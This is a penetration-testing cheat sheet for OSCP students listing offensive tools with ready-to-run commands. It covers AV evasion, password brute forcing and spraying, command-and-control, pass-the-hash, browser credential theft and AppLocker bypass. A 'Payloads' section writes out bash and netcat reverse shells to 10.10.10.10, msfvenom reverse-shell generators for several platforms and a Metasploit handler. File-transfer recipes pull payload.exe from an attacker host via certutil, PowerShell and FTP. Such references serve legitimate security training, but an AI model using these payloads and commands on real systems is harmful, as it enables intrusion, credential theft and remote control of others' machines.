Penetration testing tools
Author: root4loot
A neat list of penetration testing (and some red team) tools with usage commands and examples for quick reference. Originally intended for OSCP students.
Running (the majority of) these tools against any server without permission is considered illegal, so use with extreme caution.
AV Evasion
Veil
Python script designed to generate metasploit payloads that bypass common anti-virus solutions.
Usage:
python Veil-Evasion.py
peCloak
Python script that takes an automated approach to AV evasion.
Usage:
peCloak.py [options] [path_to_pe_file]
Example:
python peCloak.py plink.exe
..
New file saved [plink_1540964122_cloaked.exe]
OWASP ZSC
Open source software in Python language which lets you generate customized shellcodes and convert scripts to an obfuscated script.
Usage: ./zsc
zsc> help
[+] shellcode generate shellcode
[+] shellcode>generate to generate shellcode
[+] shellcode>search search for shellcode in shellstorm
[+] shellcode>download download shellcodes from shellstorm
[+] shellcode>shell_storm_list list all shellcodes in shellstorm
[+] obfuscate generate obfuscate code
[+] back Go back one step
[+] clear clears the screen
[+] help show help menu
[+] update check for update
[+] about about owasp zsc
[+] restart restart the software
[+] version software version
[+] exit/quit to exit the software
[+] # insert comment
[+] zsc -h, --help basic interface help
Brute Force
Ncrack
High-speed network authentication cracking tool.
Examples:
SSH: ncrack -u testuser -P wordlist.txt <host> -p 22
RDP: ncrack -u testuser -P wordlist.txt <host> -p 3389
FTP: ncrack -u testuser -P wordlist.txt <host> -p 21
Medusa
Login brute-forcer tool designed to be speedy, parallel and modular.
It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.
Syntax:
medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
Examples:
SSH: medusa -u testuser -P wordlist.txt -h <host> -M ssh
FTP: medusa -u testuser -P wordlist.txt -T 5 -h <host> -M ftp
RDP (pass-the-hash):
medusa -M rdp -m PASS:HASH -h <host> -u someuser -p <NTLM_hash>
Spray
Password Spraying tool for Active Directory Credentials. Supports SMB, OWA, Lync, Cisco Web VPN.
Usage:
SMB: spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
OWA: spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
Lync: spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Examples:
SMB: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS
OWA: spray.sh -owa 192.168.0.1 users.txt passwords.txt 1 35 post-request.txt
Lync: spray.sh -lync https://lyncdiscover.spiderlabs.com/ users.txt passwords.txt 1 35
Note: For POST requests, replace username and password values with "sprayuser" and "spraypassword".
THC-Hydra
Parallelized login cracker which supports numerous protocols to attack.
It is very fast and flexible, and new modules are easy to add.
Syntax:
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Examples:
SSH: hydra 10.10.10.1 -l testuser -P wordlist.txt -t 4 ssh
RDP: hydra -V -l testuser -P wordlist.txt rdp://10.10.10.1
FTP: hydra 10.10.10.1 -V -l testuser -P wordlist.txt ftp
SMB: hydra 10.10.10.1 -V -l testuser -P wordlist.txt smb
POST form:
hydra -l testuser -P wordlist.txt -e nsr 10.10.10.1 http-post-form "/login.php:username=^USER^&password=^PASS^&submit=Login:<Error message>" -V
Patator
A great multi-purpose brute-forcer, with a modular design and a flexible usage.
Examples:
FTP: patator ftp_login host=10.10.0.1 user=someUser password=FILE0 0=wordlist.txt
SSH: patator ssh_login host=10.10.0.1 user=someUser password=FILE0 0=wordlist.txt
Command & Control
dnscat2
Tool designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network.
Usage:
./dnscat
DropboxC2C
Post-exploitation agent which uses Dropbox Infrastructure for command and control operations.
Structure:
main.py - The "server" part which manages all the agents.
agent.py - The "client" part which does what the server tells.
1. Modify the API Key on agent.py and main.py (the api key must be created from the dropbox web interface)
2. Run setup.bat on a Windows Machine. You will get agent.exe which is the "compiled" agent.
3. Run main.py and run the agent on the compromised server.
gcat
A stealthy Python based backdoor that uses Gmail as a command and control server.
See https://github.com/byt3bl33d3r/gcat
Merlin
Cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.
Quick start guide:
Server: https://github.com/Ne0nd0g/merlin/wiki/Server-Execution-Quick-Start-Guide
Agent: https://github.com/Ne0nd0g/merlin/wiki/Agent-Execution-Quick-Start-Guide
Databases
NoSQLMap
Open source Python-based automated NoSQL MongoDB exploitation tool.
Usage:
python NoSQLMap
SQLmap
Open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
Usage:
python sqlmap.py [options]
Examples:
python sqlmap.py -u "http://targetsite.com/vuln.php"
python sqlmap.py -u "http://targetsite.com/login.aspx" --method POST --data "username=foo&password=bar&submit=login" --dbms=mssql --tables
Miscellaneous
httprobe
Take a list of domains and probe for working HTTP and HTTPS servers.
Example usage:
cat domains.txt | httprobe | tee alive.txt
cat domains.txt | httprobe -p http:8080 -p https:4443 | tee alive.txt
RTFM
RTFM (Red Team Field Manual) is a great and useful book, BUT a bit pointless when you have to transcribe it, so this little program will aim to be the spiritual successor to it.
Update database: ./rtfm.py -u
Search for something: ./rtfm.py -e 'Something'
Search by date: ./rtfm.py -A yyyy-mm-dd (or now/today)
List all tags: ./rtfm.py -Dt
-e (search for command): ./rtfm.py -pP -c 'sqlmap'
-t (search for tag): ./rtfm.py -pP -t xss
rescope
Rescope is a tool geared towards pentesters and bug bounty researchers that aims to make life easier when defining scopes for Burp Suite and OWASP ZAP.
Example usage:
rescope --burp -u bugcrowd.com/bugcrowd -o burpscope.json
rescope --zap --name CoolScope -u bugcrowd.com/bugcrowd -o burpscope.context
rescope --burp -i scopedefinitions.txt -o burpscope.json --silent
Network Related
Airgeddon
A multi-use bash script for Linux systems to audit wireless networks.
Usage:
sudo bash airgeddon.sh
SPARTA
Python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase.
Usage:
./sparta
SSH
Pivoting with SSH.
Port forwarding:
Local: ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote: ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic: ssh <gateway> -D <port to bind>
Plink
Pivoting with Plink.exe (SSH for Windows).
Port forwarding:
Local: plink.exe <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote: plink.exe <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic: plink.exe <gateway> -D <port to bind>
Wifite 2
A tool to attack multiple WEP and WPA encrypted networks at the same time.
Example usage:
./Wifite.py -i wlan0 --wpa
WIFIPhisher
An automated phishing attack tool for Wifi networks.
Example usage:
wifiphisher -i wlan0 -e 'Free Wifi' -hC capture.pcap
Printers
Praedasploit
Contains a number of commonly found printer exploits.
Usage:
See https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules
PRET
Printer Exploitation Toolkit - The tool that made dumpster diving obsolete.
Usage:
./pret.py [-h] [-s] [-q] [-d] [-i file] [-o file] target {ps,pjl,pcl}
Example usage:
./pret.py laserjet.lan ps
./pret.py /dev/usb/lp0 pjl
Samba
CrackMapExec
A post-exploitation tool that helps automate assessing the security of large Active Directory networks. CME makes heavy use of the Impacket library.
Example usage:
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> ~/targets.txt
Pass-the-hash:
crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
crackmapexec smb <target(s)> -u username -H NTHASH
Null sessions:
crackmapexec smb <target(s)> -u '' -p ''
enum4linux
A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.
Usage:
./enum4linux.pl [options] ip
Example:
./enum4linux.pl -U -o 192.168.1.200
nullinux
Internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB.
Usage:
python3 nullinux.py -users -quick DC1.Domain.net
python3 nullinux.py -all 192.168.0.0-5
python3 nullinux.py -shares -U 'Domain\User' -P 'Password1' 10.0.0.1,10.0.0.5
Responder
A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Usage:
./Responder.py [options]
Example:
./Responder.py -I eth0 -wrf
Smbexec
A rapid psexec style attack with samba tools.
Usage:
./smbexec
Main menu:
1. System Enumeration
2. System Exploitation
3. Obtain Hashes
4. Options
5. Exit
Smbclient
FTP-like client to access SMB/CIFS resources on servers. Part of the Samba suite.
Example usage:
Pass-the-hash:
smbclient -U testuser%<nthash> --pw-nt-hash -L 192.168.0.1
smbclient \\\\192.168.0.1\\domain -U testuser%<nthash> --pw-nt-hash
Map drives:
smbclient \\\\192.168.0.1\\sharename$
smbclient \\\\192.168.0.1\\sharename$ -U root%
Wmiexec
A similar approach to smbexec but executing commands through WMI.
Usage:
wmiexec.py [-h] [-share SHARE] [-nooutput] [-debug] [-codec CODEC]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address] [-A authfile]
target [command [command ...]]
Example:
./wmiexec.py -hashes <lmhash>:<nthash> Administrator@10.10.0.1
Web related
Arjun
Arjun is an HTTP parameter discovery suite.
Example usage:
Find GET parameters:
python3 arjun.py -u https://api.example.com/endpoint --get
Find POST parameters:
python3 arjun.py -u https://api.example.com/endpoint --post
Multi-threading:
python3 arjun.py -u https://api.example.com/endpoint --get -t 22
Delay between requests:
python3 arjun.py -u https://api.example.com/endpoint --get -d 2
Add HTTP headers:
python3 arjun.py -u https://api.example.com/endpoint --get --headers
BeEF Exploitation Framework
A cross-site scripting (XSS) attack framework.
Usage:
./beef
Burp
An awesome graphical tool for testing Web application security.
Usage:
see https://portswigger.net/burp/documentation/contents
CMSmap
Python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.
Examples:
cmsmap.py http://example.com
cmsmap.py http://example.com -f W -F --noedb -d
cmsmap.py http://example.com -i targets.txt -o output.txt
cmsmap.py http://example.com -u admin -p passwords.txt
cmsmap.py http://example.com -k hashes.txt -w passwords.txt
CORStest
A simple CORS misconfiguration scanner
Usage:
corstest.py [arguments] infile
Example usage:
corstest.py hosts.txt
Gobuster
Directory/file & DNS busting tool written in Go.
Example usage:
Standard dir bust:
gobuster -u https://example.com -w /path/to/wordlist.txt -n
Display content length:
gobuster -u https://example.com -w /path/to/wordlist.txt -l
Filter results based on status codes 200, 403:
gobuster -u https://example.com -w /path/to/wordlist.txt -s '200,403' -e
Filter results based on file extensions:
gobuster -u https://example.com -w /path/to/wordlist.txt -x 'asp,aspx'
SPartan
Frontpage and Sharepoint fingerprinting and attack tool.
Usage:
python SPartan.py -u http://127.0.0.1 -f -c
-u: host URL
-c: crawl the site for links
-f: perform frontpage scans
--sps: discover sharepoint SOAP services
Parameth
This tool brute-forces the discovery of GET and POST parameters.
Usage example:
./parameth.py -u https://example.com/somepage.php
./parameth.py -u https://example.com/somepage.php --data <post_data>
./parameth.py -u https://example.com/somepage.php --cookie <cookie>
Tplmap
Server-Side Template Injection and Code Injection Detection and Exploitation Tool.
Usage example:
Test if parameter is vulnerable to SSTI:
./tplmap.py -u 'http://www.target.com/page?name=John'
Launch a pseudo-terminal on the target:
./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
JShell
A nice little tool to quickly get a Javascript shell from XSS. Running shell.py will generate the js payload and setup a listener on port 33 (default).
Usage:
python shell.py
OWASP ZAP
Open-source web application security scanner.
Usage:
see https://github.com/zaproxy/zaproxy/wiki/Videos
Sublist3r
Fast subdomain enumeration tool for penetration testers.
Example usage:
Enumerate subdomains of specific domain:
python sublist3r.py -d example.com
Show only subdomains which have open ports 80 and 443:
python sublist3r.py -d example.com -p 80,443
Show the results in realtime:
python sublist3r.py -v -d example.com
WPScan
Black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.
Usage:
wpscan [options]
Examples:
wpscan --url http://example.com --enumerate plugins -o output.txt
wpscan --url http://example.com --password-attack=wp-login --usernames=/path/to/usernames.txt --passwords=/path/to/wordlist.txt
Wfuzz
Web application fuzzer.
Example usage:
Standard fuzz:
wfuzz -w /path/to/wordlist.txt https://example.com/FUZZ
Exclude 404 from results:
wfuzz -w /path/to/wordlist.txt https://example.com/FUZZ --hc 404
Exclude results having '117 Ch' (chars):
wfuzz -w /path/to/wordlist.txt https://example.com/FUZZ --hh 117
XSStrike
XSStrike is a Cross Site Scripting detection suite equipped with four hand-written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.
Usage: xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--verbose] [--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
Scan a single URL:
python xsstrike.py -u "http://example.com/search.php?q=query"
Supplying POST data:
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
Test URL path components:
python xsstrike.py -u "http://example.com/search/form/query" --path
Bruteforce payloads from a file:
python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt
Blind XSS:
python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind
More usage commands: https://github.com/s0md3v/XSStrike/wiki/Usage
XXE-FTP
Basic FTP server written in Go to receive payloads from instances of XXE.
Usage:
./xxeftp -p 2121
Wordlist Generators
CeWl
A Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.
Usage:
cewl [OPTIONS] ... <url>
Example:
cewl http://example.com --depth=4 --write=output.txt
Crunch
Wordlist generator based on criteria you specify. The output from crunch can be sent to the screen, file, or to another program.
Example usage:
crunch 6 6 -t foo@,% >> wordlist
# Generates foo[lowercase letter][UPPERCASE letter][0-9] (in a -t pattern, @ = lowercase, , = uppercase, % = digit, ^ = symbol)
Wordhound
Wordlist generator that builds a list of password candidates for a specific target website to use with something like Hashcat or Hydra.
Usage:
python wordhound.py https://example.com/
File Transfers (non-interactive)
Linux Target
FTP
Start vsftpd service:
service vsftpd start
Create FTP script on target as follows. Make sure the lcd path is writable:
echo open <attacker_ip> > /tmp/ftp.txt
echo user anonymous pass >> /tmp/ftp.txt
echo binary >> /tmp/ftp.txt
echo 'lcd /tmp/' >> /tmp/ftp.txt
echo get payload.php >> /tmp/ftp.txt
echo bye >> /tmp/ftp.txt
Execute script to transfer file:
ftp -n < /tmp/ftp.txt
SSH
Usage:
scp <source> <destination>
Copy file from attacker to target (run on the target):
scp username@<attacker_ip>:/path/to/file /path/to/destination
Copy file from target to attacker (run on the target):
scp /path/to/file username@<attacker_ip>:/path/to/destination
TFTP
Start atftpd service (see configuration):
service atftpd start
Run the following on target to transfer file:
tftp <attacker_ip> -c get payload.rb
Windows Target
Certutil
certutil.exe is a Windows CMD utility that comes pre-loaded in Windows as part of the certificate services. It can be used to transfer files from any web server, much like wget, which is very handy.
Example:
certutil -URLCache -f http://<attacker_ip>/payload.exe C:\temp\payload.exe
FTP
Start FTP server:
python -m pyftpdlib --username=USER --password=PASS -p 21
Create FTP script on target:
echo open <attacker_ip> > ftp.txt
echo USER >> ftp.txt
echo PASS >> ftp.txt
echo binary >> ftp.txt
echo get payload.exe >> ftp.txt
echo bye >> ftp.txt
Run script to transfer file:
ftp -s:ftp.txt
Powershell
Create ps1 script on target as follows:
echo $fileURL = "http://<attacker_ip>/payload.exe" > wget.ps1
echo $fileName = "C:\path_to\payload.exe" >> wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $webclient.DownloadFile($fileURL,$fileName) >> wget.ps1
Execute script to get file from web server:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
SMB
Start SMB server with Impacket:
python smbserver.py SHARENAME /path/to/shared/folder
Run the following on target to transfer file:
copy \\<attacker_ip>\SHARENAME\payload.exe
TFTP
Start atftpd service (see configuration):
service atftpd start
Run the following on target to transfer file:
tftp -i <attacker_ip> GET payload.exe
Information Gathering
Active
AQUATONE
Aquatone is a tool for visual inspection of websites across a large number of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
Example Usage:
cat targets.txt | aquatone
cat hosts.txt | aquatone -ports 80,443,3000,3001
cat hosts.txt | aquatone -ports large
Discover Scripts
Custom bash scripts used to automate various pentesting tasks.
Usage:
See https://github.com/leebaird/discover
Eyewitness
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
Usage:
./EyeWitness.py -f filename --timeout optionaltimeout --open (Optional)
Examples:
./EyeWitness -f urls.txt --web
./EyeWitness -x urls.xml --timeout 8 --headless
./EyeWitness -f rdp.txt --rdp
HTTPScreenshot
A tool for grabbing screenshots and HTML of a large number of websites.
Usage:
./httpscreenshot.py -i <gnmapFile> -p -w 40 -a -vH
ReconDog
Reconnaissance Swiss Army Knife.
Features include Censys lookup, NS lookup, Subdomain lookup, Reverse IP lookup, Port scan, CMS detection, Honeypot detection.
Usage:
python ./dog.py
MASSCAN
TCP port scanner that spews SYN packets asynchronously. Capable of scanning the entire Internet in a few minutes.
Usage:
masscan -p80,8000-8100 10.0.0.0/8
Example:
masscan -vvv -iL hosts.txt -p0-65535 --rate 1000 -oL mass.scan
Banner checking:
masscan 10.0.0.0/8 -p80 --banners --source-ip 192.168.1.200
To see the complete list of options, use the --echo feature:
masscan -p80,8000-8100 10.0.0.0/8 --echo > xxx.conf
masscan -c xxx.conf --rate 1000
Passive
Amass
The OWASP Amass tool suite obtains subdomain names by scraping data sources, recursive brute forcing (warning: active), crawling web archives, permuting/altering names and reverse DNS sweeping.
Usage example:
./amass -src -ip -config amass_config.ini -d owasp.org
ct-exposer
An OSINT tool that discovers sub-domains by searching Certificate Transparency logs. The nice thing about this one is that you can export output to masscan format.
usage: ct-exposer.py [-h] -d DOMAIN [-u] [-m]
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
domain to query for CT logs, ex: domain.com
-u, --urls ouput results with https:// urls for domains that
resolve, one per line.
-m, --masscan output resolved IP address, one per line. Useful for
masscan IP list import "-iL" format.
Gitrob
Reconnaissance tool for GitHub organizations. A tool to help find potentially sensitive files pushed to public repositories on GitHub. Gitrob will clone repositories belonging to a user or organization down to a configurable depth, iterate through the commit history and flag files that match signatures for potentially sensitive files. The findings are presented through a web interface for easy browsing and analysis.
Usage:
./gitrob [options] target [target2] ... [targetN]
Knock
Knockpy is a Python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled.
Example Usage:
Subdomain scan with internal wordlist:
$ knockpy domain.com
Subdomain scan with external wordlist:
$ knockpy domain.com -w wordlist.txt
Resolve domain name and get response headers:
$ knockpy -r domain.com [or IP]
SubBrute
A DNS meta-query spider that enumerates DNS records, and subdomains.
Example usage:
./subbrute.py google.com -o google.names
...162 subdomains found...
./subbrute.py -s google.names google.com --type TXT
google.com,"v=spf1 include:_spf.google.com ip4:216.73.93.70/31 ip4:216.73.93.72/31 ~all"
adwords.google.com,"v=spf1 redirect=google.com"
...
./subbrute.py -s google.names google.com --type CNAME
blog.google.com,www.blogger.com,blogger.l.google.com
groups.google.com,groups.l.google.com
...
Subfinder
SubFinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
The following require API keys:
VirustotalAPIKey
PassivetotalUsername
PassivetotalKey
SecurityTrailsKey
RiddlerEmail
RiddlerPassword
CensysUsername
CensysSecret
ShodanAPIKey
Setting API keys:
./subfinder --set-config VirustotalAPIKey=0x41414141
Example usage:
./subfinder -d freelancer.com
./subfinder -d freelancer.com -o output.txt
Subjack
Subdomain takeover tool written in Go.
Example usage:
./subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl
Sublist3r
Fast subdomain enumeration tool for penetration testers.
Example usage:
python sublist3r.py -d example.com
python sublist3r.py -d example.com -p 80,443
Spiderfoot
Reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more.
Usage:
python ./sf.py
Zen
Find emails of Github users.
Example usage:
Find email address of a user:
python zen.py username
Find email addresses of contributors of a repository:
python zen.py https://github.com/username/repository
Find email addresses of members of an organization:
python zen.py organization --org
Save JSON output to a file:
python zen.py https://github.com/username/repository -o /path/to/file
Check if email has appeared in a breach (haveibeenpwned.com API):
python zen.py s0md3v --breach
Payloads
Generic / Kali
Bash reverse shell
bash -i >& /dev/tcp/10.10.10.10/443 0>&1
Netcat reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.10 443 > /tmp/f
Web shells
JSP: /opt/SecLists/Web-Shells/JSP/simple-shell.jsp
PHP: /opt/SecLists/Web-Shells/PHP/obfuscated-phpshell.php
Wordpress: /opt/SecLists/Web-Shells/WordPress/access.php
Pentestmonkey:
ASP: /usr/share/webshells/asp/cmd-asp-5.1.asp
/usr/share/webshells/asp/cmdasp.asp
ASPX: /usr/share/webshells/aspx/cmdasp.aspx
CFM: /usr/share/webshells/cfm/cfexec.cfm
JSP: /usr/share/webshells/jsp/cmdjsp.jsp
/usr/share/webshells/jsp/jsp-reverse.jsp
PERL: /usr/share/webshells/perl/perlcmd.cgi
/usr/share/webshells/perl/perl-reverse-shell.pl
PHP: /usr/share/webshells/php/php-backdoor.php
/usr/share/webshells/php/php-reverse-shell.php
/usr/share/webshells/php/simple-backdoor.php
Msfvenom
List payloads:
msfvenom -l payloads
Staged payloads have a slash between stager and stage, e.g. <platform>/shell/reverse_tcp and <platform>/meterpreter/reverse_tcp.
Stageless payloads use an underscore, e.g. <platform>/shell_reverse_tcp.
The majority of payloads below are stageless.
Windows
x86 Binary: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread --platform windows -a x86 -e generic/none -f exe -o payload.exe
x64 Binary: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread --platform windows -a x64 -e generic/none -f exe -o payload.exe
Meterpreter: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe > payload.exe
Shellcode(C): msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c
Shellcode(Python): msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -b "\x00" -f python -v shellcode
Linux
x86 Binary: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f elf > payload.elf
x64 Binary: msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f elf > payload.elf
Bash: msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.10 LPORT=443 -f raw > payload.sh
Python: msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=443 -f raw > payload.py
Shellcode(C): msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -b '\x00' -f c
Shellcode(Python): msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode
Perl: msfvenom -p cmd/unix/reverse_perl LHOST=10.10.10.10 LPORT=443 -f raw > payload.pl
Mac
x86: msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f macho > payload.macho
x64: msfvenom -p osx/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f macho > payload.macho
Web based
WAR: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f war > payload.war
JSP: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f raw > payload.jsp
ASP: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f asp > payload.asp
PHP: msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f raw > payload.php && cat payload.php | pbcopy && echo '<?php ' | tr -d '\n' > payload.php && pbpaste >> payload.php
Handler
msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set PAYLOAD windows/ARCH/meterpreter/reverse_tcp
msf exploit(handler) > set EXITFUNC thread
msf exploit(handler) > set LHOST 10.10.10.10
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit -j
Other
SharPyShell
SharPyShell (Python) is a tiny and obfuscated ASP.NET webshell that executes commands received over an encrypted channel, compiling them in memory at runtime.
Example usage:
python SharPyShell.py generate -p somepassword
python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword
Post Exploitation
Linux
LinEnum
Bash script for local Linux enumeration & privilege escalation checks.
Usage:
./linenum.sh
linux-exploit-suggester
Linux privilege escalation auditing tool.
Usage:
./linux-exploit-suggester.sh
Linux Exploit Suggester
Perl-based Linux privesc checker. Running without arguments will perform a 'uname -r' to grab the Linux release version and return a list of suggested exploits. The kernel version can be specified with the -k flag.
Usage:
perl ./Linux_Exploit_Suggester.pl
linuxprivchecker
Linux privilege escalation check script.
Usage:
python linuxprivchecker.py
unix-privesc-check
A bash script that runs on Unix systems (tested on Solaris 9, HPUX 11, various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).
Usage:
./unix-privesc-check.sh
Multi-Platform
Pupy
Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in Python.
Usage:
./start-compose.sh
Windows
BrowserGather
Powershell script to extract sensitive browser information from Chrome, Firefox and IE.
First, import the module:
import-module .\BrowserGather.ps1
Extract credentials:
Get-ChromeCreds "C:\Users\sekirkity\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data" | format-list *
Extract cookies:
Get-ChromeCookies "C:\Users\sekirkity\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies" | format-list *
Empire
Powerful PowerShell & Python post-exploitation agent.
Usage:
./empire
Tips and tricks:
https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/
Unicorn
A simple tool for using a PowerShell downgrade attack to inject shellcode straight into memory.
Usage:
python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
Help Menu: python unicorn.py --help
Example usage:
PS: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Custom PS1: python unicorn.py <path to ps1 file>
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Sherlock
PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
Usage:
Add the desired function to the end of the file.
powershell -nologo -executionpolicy bypass -file sherlock.ps1
p0wnedShell
Offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier.
Example usage:
Run as x64 binary and bypass Applocker:
cd \Windows\Microsoft.NET\Framework\v4.0.30319
InstallUtil.exe /logfile= /LogToConsole=false /U C:\p0wnedShell\p0wnedShellx86.exe
Windows Exploit Suggester - Next Generation (WES-NG)
WES-NG is a tool (Python) based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.
How to use:
1. Generate systeminfo:
systeminfo > systeminfo.txt
2. Run WES-NG against it:
wes.py systeminfo.txt
See also: Eliminating False Positives (https://github.com/bitsadmin/wesng/wiki/Eliminating-false-positives)
Windows-Exploit-Suggester
This tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
Usage:
./windows-exploit-suggester.py --update